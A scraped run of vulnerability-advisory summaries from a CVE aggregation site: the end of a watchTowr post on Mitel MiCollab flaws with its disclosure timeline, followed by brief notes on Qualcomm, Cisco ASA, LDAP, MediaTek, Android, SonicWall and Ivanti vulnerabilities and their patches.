With regards to the Authentication Bypass vulnerability, Mitel was quick to issue us with a draft security advisory, indicating that our new CVE-2024-41713 has a critical impact on MiCollab versions 9.8 SP1 (9.8.1.5) and earlier (see the [advisory and patches](https://www.mitel.com/support/security-advisories/mitel-product-security-advisory-misa-2024-0029?ref=labs.watchtowr.com)). Users are urged to update to 9.8 SP2 (9.8.2.12) as soon as possible.
As demonstrated - it was fairly trivial to gain access to all sorts of administrative `war` files. Honestly, our attention spans are brief, and we just haven’t managed to dive too deep into these `war` files - the reality of discovering the Arbitrary File Read vulnerability while preparing this blogpost tells us that this is not the end of the road for this Mitel solution.
While Mitel's PSIRT team was quick to remediate the Authentication Bypass vulnerability, as of the time of writing and publishing this blog post, Mitel has exceeded our 90-day vulnerability disclosure window regarding the Arbitrary File Read issue. Given that it requires authentication to exploit, and that it isn't really worthy of a blog post on it's own, we're disclosing it here.
Mitel informed us on October 12th 2024 that a patch would be due the 'first week of December', but as mentioned and keenly reiterated - we’re yet to see any movement on their security advisory page.
It may go without saying that it shouldn't be easy to compromise a communications system. Gone are the days of 'plain old' telephone lines, running ATM or some other guaranteed-bandwidth TDM protocol to achieve high-availability - everything nowadays goes over IP. While this obviously brings great convenience in administration, it also risks exposing all those soft squishy protocols that were formerly only accessible from privileged network positions right to the doorstep of sophisticated attackers. Some might opine that vendors need to be more mindful of the real value of the data their servers are carrying and secure it appropriately.
On a more technical level, this investigation has demonstrated some valuable lessons. Firstly, it has acted as a real-world example that full access to the source code is not always needed —even when diving into vulnerability research to reproduce a known weakness in a COTS solution. Depending on the depth of the CVE description, some good Internet search skills can be the basis for a successful hunt for vulnerabilities.
> For those concerned in the audience, we are sorry in advance for disclosing this Google search technique to the ransomware gangs and APT groups that may read blogposts that sit on the Internet. We know that sharing this Google search technique meets your bar of enabling criminals, and we are sorry.
Much like our previous dive into the Ivanti Connect Secure SSLVPN, where we discovered an XXE in their SSLVPN, we’re reminded that ‘where there’s smoke, there’s fire’ and more vulnerabilities to be found. Even a slight whiff of wood burning in the ether can be enough to attract our attention and warrant further investigation.
Here at [watchTowr](https://www.watchtowr.com/?ref=watchtowr-labs-blog), we believe continuous security testing is the future, enabling the rapid identification of holistic high-impact vulnerabilities that affect your organisation.
If you'd like to learn more about the [**watchTowr Platform**](https://www.watchtowr.com/?ref=watchtowr-labs-blog)**, our Continuous Automated Red Teaming and Attack Surface Management solution**, please get in touch.
Timeline
--------
* Date: 29th May 2024
* Detail: Authentication Bypass and SQL Injection vulnerabilities discovered
* Date: 29th May 2024
* Detail: Vulnerabilities disclosed to Mitel PSIRT
* Date: 30th May 2024
* Detail: watchTowr hunts through client attack surfaces for impacted systems, and communicates with those affected
* Date: 14th June 2024
* Detail: Mitel acknowledges our replication of CVE-2024-35286 (SQL Injection) and begins investigating the Authentication Bypass vulnerability
* Date: 30th July 2024
* Detail: Mitel provides a draft Security Advisory 24-000D-001 and assigns CVE-2024-41713 to the Authentication Bypass vulnerability
* Date: 26th August 2024
* Detail: Arbitrary File Read vulnerability disclosed to Mitel PSIRT
* Date: 9th October 2024
* Detail: Mitel publish security advisory and patches for the Authentication Bypass vulnerability CVE-2024-41713
* Date: 12th October 2024
* Detail: Mitel informs watchTowr that a patch will be released for the Arbitrary File Read vulnerability in the first week of December 2024
* Date: 4th December 2024
* Detail: A hundred days have passed since watchTowr informed Mitel of the Arbitrary File Read without a patch, advisory, or CVE issued
* Date: 5th December 2024
* Detail: watchTowr publish blog and PoCs
2024-12-16T06:18:24.996116+00:00https://cve.circl.lu/bundle/c1d2888a-e3fb-49e6-ba8f-5034c43415afThe Qualcomm DSP Driver - How Serbian authorities have deployed surveillance technology and digital repression tactics2025-01-13T10:13:05.974493+00:00Cédric Bonhommehttp://cve.circl.lu/user/cedricAmnesty International identified how Serbian authorities used Cellebrite to exploit a zero-day vulnerability (a software flaw which is not known to the original software developer and for which a software fix is not available) in Android devices to gain privileged access to an environmental activist’s phone. The vulnerability, identified in collaboration with security researchers at Google Project Zero and Threat Analysis Group, affected millions of Android devices worldwide that use the popular Qualcomm chipsets. An update fixing the security issue was released in the October 2024 Qualcomm Security Bulletin.
[Related bundle](https://vulnerability.circl.lu/bundle/aaa30339-107b-4cb3-8a1a-3e5d8398b429) on Vulnerability-Lookup (Patch for Android).
#### Investigation from Amnesty International
[https://github.com/AmnestyTech/investigations/tree/master/2024-12-16_serbia_novispy](https://github.com/AmnestyTech/investigations/tree/master/2024-12-16_serbia_novispy)
#### “A Digital Prison”: Surveillance and the suppression of civil society in Serbia
[https://securitylab.amnesty.org/latest/2024/12/a-digital-prison-surveillance-and-the-suppression-of-civil-society-in-serbia/](https://securitylab.amnesty.org/latest/2024/12/a-digital-prison-surveillance-and-the-suppression-of-civil-society-in-serbia/)
2024-12-17T21:34:38.480165+00:00https://cve.circl.lu/bundle/0f4cd48e-b3f2-4cb5-81ea-77ddf45a56e0Cisco Adaptive Security Appliance (ASA) Software and Cisco Firepower Threat Defense (FTD)2025-01-13T10:13:05.972580+00:00Jean-Louis Huynenhttp://cve.circl.lu/user/gallyCVE-2024-20353 is a denial-of-service attack that allows a remote, unauthenticated attacker to cause the device to reload unexpectedly, resulting in a denial-of-service condition. CVE-2024-20358 is a command injection attack that allows a local, authenticated attacker with Administrator level privileges to run arbitrary commands as root on the underlying device operating system. CVE-2024-20359 is similar and is an arbitrary code execution attack that allows a local, authenticated attacker with Administrator level privileges to execute arbitrary code as root on the underlying device operating system.2024-12-20T07:12:35.208963+00:00https://cve.circl.lu/bundle/9aa579cb-be14-4a74-9427-91defcc2ccd5PoC LDAPNightmare: The CVE Mix-Up (as noted by @wdormann@infosec.exchange)2025-01-13T10:13:05.972482+00:00Cédric Bonhommehttp://cve.circl.lu/user/cedricA PoC for CVE-2024-49113 titled “Windows Lightweight Directory Access Protocol (LDAP) Denial of Service Vulnerability.” is provided by SafeBreach.
However, there was confusion between CVE-2024-49113 (DoS) and CVE-2024-49112 (RCE - CVSS 9.8), as noted by @wdormann@infosec.exchange:
https://github.com/SafeBreach-Labs/CVE-2024-49113/commit/eb76381b2927ce78c86743267d898b4ebfcbb1872025-01-02T22:04:08.366908+00:00https://cve.circl.lu/bundle/a5165ebe-ef02-4a51-b2a6-2950b3c37690MediaTek January 2025 Product Security Bulletin (severe vulnerability)2025-01-13T10:13:05.972347+00:00Cédric Bonhommehttp://cve.circl.lu/user/cedricMediaTek has released its January 2025 Product Security Bulletin:
https://corp.mediatek.com/product-security-bulletin/January-2025
Out-of-bounds write vulnerabilities in power management (CVE-2024-20140) and the Digital Audio subsystem (CVE-2024-20143, CVE-2024-20144, CVE-2024-20145). These vulnerabilities could lead to local privilege escalation, potentially allowing attackers to gain unauthorized access to sensitive data or system functionalities.
These vulnerabilities could lead to local privilege escalation, potentially allowing attackers to gain unauthorized access to sensitive data or system functionalities.
Other vulnerabilities addressed include issues in the WLAN driver (CVE-2024-20146, CVE-2024-20148) that could lead to remote code execution and an out-of-bounds write vulnerability in the M4U subsystem (CVE-2024-20105) that could allow for local privilege escalation.
MediaTek has notified device manufacturers (OEMs) about these vulnerabilities and provided corresponding security patches. Users are strongly encouraged to check for updates from their device manufacturers and apply them as soon as possible to mitigate these security risks.2025-01-07T07:03:20.063825+00:00https://cve.circl.lu/bundle/a30ff14f-a073-49be-8c0c-6b6afd6a19f32025-01-05 Android security bulletin - MediaTek components2025-01-13T10:13:05.970133+00:00Cédric Bonhommehttp://cve.circl.lu/user/cedricVulnerabilities affecting MediaTek components and further details are available directly from MediaTek. The severity assessment of these issues is provided directly by MediaTek.
| CVE | References | Severity | Subcomponent |
|--------------------|----------------|------------|--------------|
| CVE-2024-20154 | A-376809176 | Critical | Modem |
| CVE-2024-20146 | A-376814209 | High | wlan |
| CVE-2024-20148 | A-376814212 | High | wlan |
| CVE-2024-20105 | A-376821905 | High | m4u |
| CVE-2024-20140 | A-376816308 | High | power |
| CVE-2024-20143 | A-376814208 | High | DA |
| CVE-2024-20144 | A-376816309 | High | DA |
| CVE-2024-20145 | A-376816311 | High | DA |
The user must update the device as soon as possible.2025-01-07T07:09:05.334532+00:00https://cve.circl.lu/bundle/602ffeaf-2425-48cc-967c-0efad9629dd0Sonicwall vulnerabilities including critical ones2025-01-13T10:13:05.969985+00:00Alexandre Dulaunoyhttp://cve.circl.lu/user/adulau| Advisory ID | CVSS Score | Advisory Title | Associated CVEs |
|--------------------|------------|-------------------------------------------------------------------|-------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------|
| SNWLID-2025-0003 | CVSS Score 8.2 | SONICOS AFFECTED BY MULTIPLE VULNERABILITIES | - **CVE-2024-40762**: SonicOS SSLVPN Use of Cryptographically Weak Pseudo-Random Number Generator (PRNG) - CVSS Score 7.1. Use of a weak PRNG in the SonicOS SSLVPN authentication token generator can allow attackers to predict the token, potentially resulting in authentication bypass. <br> - **CVE-2024-53704**: SonicOS SSLVPN Authentication Bypass Vulnerability - CVSS Score 8.2. <br> - **CVE-2024-53705**: SonicOS SSH Management Server-Side Request Forgery Vulnerability - CVSS Score 6.5. <br> - **CVE-2024-53706**: Gen7 SonicOS Cloud NSv SSH Config Function Local Privilege Escalation Vulnerability - CVSS Score 7.8. |
| SNWLID-2024-0013 | CVSS Score 5.3 | INTEGER-BASED BUFFER OVERFLOW VULNERABILITY IN SONICOS VIA IPSEC | - **CVE-2024-40765**: Integer-based buffer overflow vulnerability in SonicOS via IPsec. Allows denial of service and potential execution of arbitrary code. CVSS Score 5.3. |
| SNWLID-2025-0001 | CVSS Score 6.5 | SSL-VPN MFA BYPASS DUE TO UPN AND SAM ACCOUNT HANDLING IN MICROSOFT AD | - **CVE-2024-12802**: SSL-VPN MFA Bypass in SonicWALL SSL-VPN due to separate handling of UPN (User Principal Name) and SAM (Security Account Manager) account names when integrated with Microsoft Active Directory. Allows MFA bypass by exploiting alternative account name handling. CVSS Score 6.5. |
| SNWLID-2025-0004 | CVSS Score 6.0 | SONICOS MULTIPLE POST-AUTHENTICATION VULNERABILITIES | - **CVE-2024-12803**: Post-authentication stack-based buffer overflow vulnerability in SonicOS. CVSS Score 6.0. <br> - **CVE-2024-12805**: Post-authentication format string vulnerability in SonicOS. CVSS Score 6.0. <br> - **CVE-2024-12806**: Post-authentication absolute path traversal vulnerability in SonicOS. CVSS Score 4.9. |
Source: [https://i.imgur.com/VpI6jkI.png](https://i.imgur.com/VpI6jkI.png)2025-01-07T12:45:13.072825+00:00https://cve.circl.lu/bundle/c4a175b4-dfdf-4bd2-83a1-db67f7fb9aa5Security Advisory Ivanti Connect Secure, Policy Secure & ZTA Gateways (CVE-2025-0282, CVE-2025-0283)2025-01-13T10:13:05.966335+00:00Alexandre Dulaunoyhttp://cve.circl.lu/user/adulauCreated Date Jan 8, 2025 4:55:55 PM
Last Modified Date Jan 8, 2025 6:00:09 PM
# Summary
[https://forums.ivanti.com/s/article/Security-Advisory-Ivanti-Connect-Secure-Policy-Secure-ZTA-Gateways-CVE-2025-0282-CVE-2025-0283?language=en_US](https://forums.ivanti.com/s/article/Security-Advisory-Ivanti-Connect-Secure-Policy-Secure-ZTA-Gateways-CVE-2025-0282-CVE-2025-0283?language=en_US)
Ivanti has released an update that addresses one critical and one high vulnerability in Ivanti Connect Secure, Policy Secure and ZTA Gateways. Successful exploitation of CVE-2025-0282 could lead to unauthenticated remote code execution. CVE-2025-0283 could allow a local authenticated attacker to escalate privileges.
A patch is available now, please refer to the table below for each affected product.
We are aware of a limited number of customers’ Ivanti Connect Secure appliances being exploited by CVE-2025-0282 at the time of disclosure. We are not aware of these CVEs being exploited in Ivanti Policy Secure or ZTA gateways.
We are not aware of any exploitation of CVE-2025-0283 at the time of disclosure.
Exploitation of CVE-2025-0282 can be identified by the Integrity Checker Tool (ICT). We strongly advise all customers to closely monitor their internal and external ICT as a part of a robust and layered approach to cybersecurity to ensure the integrity and security of the entire network infrastructure.
# Vulnerability Details
CVE Number
Description
CVSS Score (Severity)
CVSS Vector
CWE
CVE-2025-0282
A stack-based buffer overflow in Ivanti Connect Secure before version 22.7R2.5, Ivanti Policy Secure before version 22.7R1.2, and Ivanti Neurons for ZTA gateways before version 22.7R2.3 allows a remote unauthenticated attacker to achieve remote code execution.
9.0 (Critical)
CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:C/C:H/I:H/A:H
CWE-121
CVE-2025-0283
A stack-based buffer overflow in Ivanti Connect Secure before version 22.7R2.5, Ivanti Policy Secure before version 22.7R1.2, and Ivanti Neurons for ZTA gateways before version 22.7R2.3 allows a local authenticated attacker to escalate their privileges.
7.0 (High)
CVSS:3.0/AV:L/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H
CWE-121
2025-01-08T18:43:09.190345+00:00